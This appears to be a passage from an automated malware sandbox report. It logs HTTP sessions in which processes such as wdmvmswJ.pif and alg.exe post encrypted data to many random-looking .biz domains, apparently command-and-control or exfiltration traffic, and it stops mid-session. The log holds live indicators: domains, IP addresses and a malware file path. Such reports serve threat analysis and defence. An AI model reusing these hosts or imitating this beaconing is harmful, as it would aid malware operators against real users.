                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qQvC_HLKrlF;C1W+"rdn7KL8G;`i\qS+K,n;nb|::Wgt8sr*a3R1Vk}al<1dZ$!iSo}x|Db?'sS\"
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.385570049 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=eebb9762fc28126f3fd3940a32f565cc|173.254.250.82|1730445861|1730445861|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        78192.168.2.84979413.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.477569103 CET347OUTPOST /yhjy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.477596998 CET802OUTData Raw: 33 de f7 ce 92 5c ee dc 16 03 00 00 24 a7 31 8a b9 93 ed a4 58 91 82 92 1f 2a 57 85 6e 26 e5 06 0b e8 31 4a 25 4c 51 f3 42 dd 2a ee 69 c6 2f 0a 50 c4 a6 f6 c5 26 d4 fd 20 4a 32 5e c4 a4 b3 d9 01 95 4a 0a 63 97 39 ed be 4a df f3 8b 75 18 06 87 3d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3\$1X*Wn&1J%LQB*i/P& J2^Jc9Ju=!=q6"`M.uWKu,0>d`6/^B3CcVeW3!n[Z^lqDo0s7wSl!Y\xE#<DZU1{jIqo\'qo?Uh#6B_%asXb
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.918073893 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=402579d32a4affc3639b391fe963b50a|173.254.250.82|1730445862|1730445862|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        79192.168.2.84979554.244.188.177804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.492954969 CET346OUTPOST /om HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.493026018 CET778OUTData Raw: ec 0a 10 cd 59 de 81 f1 fe 02 00 00 f7 1c 26 73 6a 4e f1 89 9e 82 2b e4 f9 10 41 7d 2c 4b f5 07 d5 b6 5d e2 37 d6 5d 44 00 59 d2 92 3b 3b de 8e 4a fe 97 3e da 90 bb 0d 71 1c 89 8c 31 2f 91 d6 9d 3e 4a 63 d0 b2 9b 38 87 8b 7d 08 9a c0 2f 09 30 4d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y&sjN+A},K]7]DY;;J>q1/>Jc8}/0M@g8W.3-l% !Y0e8`fFnZx}pWlL(hf![qcKx1@*%o5U~D~?)T37OO$iPHk0-P>o_[a
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.326581955 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ad2b355a82aa7588a7ee9e6bfec90bb1|173.254.250.82|1730445862|1730445862|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        80192.168.2.84979618.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.600342989 CET346OUTPOST /gho HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.600387096 CET778OUTData Raw: a8 47 f1 92 48 0b ff 9a fe 02 00 00 e9 5c 04 5e 0c 9a 9a 38 59 ce 69 0e 88 bb b3 28 ff 66 97 4c cc ea 2e ff 9e 2a 97 f4 bd eb 07 90 ba 3a ef 7e 97 48 6e 72 f0 d7 e3 9f 42 48 4a c9 ff 0b 05 c1 43 c6 bd 07 04 4c a9 b0 92 01 ca 6b f3 a3 31 69 21 9a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GH\^8Yi(fL.*:~HnrBHJCLk1i!aBVAFD[lPpHOa5}a( Hw9#b{_qs7Emp3fUyL3h:Ox#(hzn'z6T,*dmE2*rQ!;y9Ux
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.035419941 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a0fed0111d370b8003f1b6ed1b538aaa|173.254.250.82|1730445863|1730445863|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        81192.168.2.84979734.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143762112 CET348OUTPOST /ulgmbpj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.143785954 CET802OUTData Raw: 16 b6 62 69 22 b9 23 0a 16 03 00 00 b3 88 30 1c 9b db 42 a0 7c 83 67 bb c8 ac e4 00 f6 87 f2 40 0f 87 a1 00 ad 07 cd 84 b1 b0 20 d9 fb 7b 76 ee cd e7 96 d8 6e 91 96 af d1 0c d9 c4 f9 db 2e 3c 95 4a 9f 69 a9 30 57 8e 40 9d 30 5c 9f e7 4e bc 0a 62
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bi"#0B|g@ {vn.<Ji0W@0\Nbdy~[RT+p2V4=Dk|!TxI3?'o^+lXhWG^b1'N;EW3.22.vm/v=+[9/+j
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.967966080 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7363f3a8700c1ff50daa9751734b02ae|173.254.250.82|1730445863|1730445863|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        82192.168.2.8497983.94.10.34804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.011464119 CET349OUTPOST /leqj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.011483908 CET802OUTData Raw: 34 1d 89 00 d8 49 fa 04 16 03 00 00 bc 8f 38 ab 77 25 86 8e 20 f0 5a 2c 09 ee c4 53 0c d4 ef ef 77 7c 46 4b d5 63 2e 12 8a 59 af f2 19 5e c4 b1 af b2 20 e9 4c 3f ac 51 bb c7 57 d4 93 40 95 a3 6a 20 78 20 67 d8 0b 12 c8 bf 8d 51 35 f1 d1 fc da fd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 4I8w% Z,Sw|FKc.Y^ L?QW@j x gQ5:@>(7G8$EY@~5(*S;p^CJ {#^?\GNUOZW'%g)DGi%voR_1/>R>u{_K#}v
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.670476913 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=00239e451e832b67d2779fcaa1cb1e7e|173.254.250.82|1730445864|1730445864|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        83192.168.2.84979918.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.210942984 CET353OUTPOST /ixcnnbyrmpnn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.210972071 CET778OUTData Raw: 7a 18 6a 20 6e e2 5d 93 fe 02 00 00 ef 72 b0 36 3e 11 79 5d da bf 76 23 bf d2 95 d1 23 18 b3 05 f9 36 9d 06 97 d7 49 2e 4b 77 8f b3 fe eb 11 da 7f 1c 1e f0 18 4c 27 d4 ac 9d 1b 10 df c6 f5 07 36 ab b6 f7 61 c1 0b bf 0c 2b 12 9b a2 60 a2 3d 36 ef
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zj n]r6>y]v##6I.KwL'6a+`=6}Gb|XOz-<IIE=@g1r~zV[}LwLw4U_}=_N'T\_|gr57z5}$PuFMr}KzoigT8^2B;Ds4s
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.889277935 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a18a9f10b7ee33b3ca25271258b08901|173.254.250.82|1730445864|1730445864|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        84192.168.2.84980018.246.231.120804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.716382027 CET353OUTPOST /iuqfwfkapu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.716408968 CET802OUTData Raw: e9 e9 30 75 8c ff 2e fb 16 03 00 00 55 be 66 48 42 0e 66 4c 7c 13 3a 56 0f 48 92 21 53 e6 c8 07 12 81 87 73 64 05 79 94 11 32 5c df cf d6 5f 62 9a 11 21 e5 a5 69 80 2f bf ff f9 e1 7c 97 db 9a ba c8 99 ce 1a 7a 22 52 d2 a5 b8 c7 1f bf e1 9f b2 36
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0u.UfHBfL|:VH!Ssdy2\_b!i/|z"R6LZG>Xw/,t4C.#ASq,t!p]DrM^6DHHy>*vabZT$)bRAo,w6<r6\VwzOB8Y,to=[:km[t4h'
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.548032045 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e81758bdb2893879014c4257be859b|173.254.250.82|1730445865|1730445865|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        85192.168.2.84980144.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.045723915 CET357OUTPOST /ymsikktgwjcaw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.045813084 CET778OUTData Raw: 86 aa f0 bd 70 36 b3 81 fe 02 00 00 85 b1 5b 57 64 6a 8d 72 43 6a 17 84 87 0b a6 0d e8 e8 e2 7b fe b4 86 d4 97 83 6d 74 43 73 3d 00 ae 0c b5 ee d5 89 4e 84 70 95 e7 cb 55 31 3f 25 59 0b 7e 9a f4 a9 9b e0 43 67 67 97 95 ad 56 7b 6a 86 e5 6d c7 5b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: p6[WdjrCj{mtCs=NpU1?%Y~CggV{jm[ 7[O#l,]+(K;)Z<"VP@\VY6$T0hv,4~n2E-jA/J;YA,9"
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.706679106 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cd8b9fab083f6114b6bd1ccaa3ac735d|173.254.250.82|1730445865|1730445865|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        86192.168.2.8498023.254.94.185804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.599131107 CET351OUTPOST /rvfsblrqhy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.599158049 CET802OUTData Raw: d9 ed 93 2f 24 97 34 b0 16 03 00 00 ff 31 a5 db 48 b0 4a 94 ee 79 ce 72 ed 3a c0 d5 70 35 f3 b9 3c 9c 88 54 e0 a3 26 f8 8e 9d c3 2b c4 79 37 40 21 c8 bf e5 e3 eb f4 61 74 63 fe 38 57 58 e7 e1 17 20 0a 39 53 19 aa f7 80 23 e7 56 a5 f9 aa a1 83 7a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /$41HJyr:p5<T&+y7@!atc8WX 9S#VzFG;-O</G,D0d3j6PfO0%v)V$\F.7xd0xt(HSD2_-Iz5$Sm
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.563851118 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b31c4fabe272c6f55f706f6172f6e684|173.254.250.82|1730445866|1730445866|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        87192.168.2.84980318.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.910295963 CET359OUTPOST /wiuuagnokpngbsx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
